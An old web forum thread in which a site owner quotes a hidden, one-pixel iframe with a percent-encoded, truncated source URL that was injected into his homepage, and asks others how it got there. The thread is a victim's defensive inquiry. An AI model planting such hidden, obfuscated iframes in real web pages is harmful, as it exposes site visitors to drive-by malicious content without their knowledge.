IFRAME insert origin?

Discussion in 'Windows Desktop Systems' started by melon, Dec 19, 2005.

1. melon

melon MS-DOS 2.0 Political User

Not sure which forum this belongs in, but I'm a bit peeved. Someone made me aware that they were getting errors on my website, and, looking at the code, I found this was inserted at the top of my index.html page:

Code:
    iframe src= http://%77%77%77%...(etc.)?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
    Note that I cut off the series of "%xx" numbers, because I think you get the idea. Checking the "last modified" date, it was inserted on December 17th. I've done lots of searching, and I can't find any information at all on anything similar to this. Does anyone know of a vulnerability floating around that would cause something like this?

Melon

2. Khayman

Khayman I'm sorry Hal... Political User Folding Team

if you're using somekind of free hosting, they may have inserted the code for ads

3. melon

melon MS-DOS 2.0 Political User

It's a paid host, so it wouldn't be anything like that. I've already removed the code with no problems.

Thought: it's a shared hosting solution. If another user on the server was using vulnerable code (like an out-of-date forum software), I presume it could hit everyone on the same server? It's just baffling me, because I even checked my access logs to correspond to the "last modified" date on my index.html file, and there's absolutely nothing out of the ordinary.

Ideas?

Melon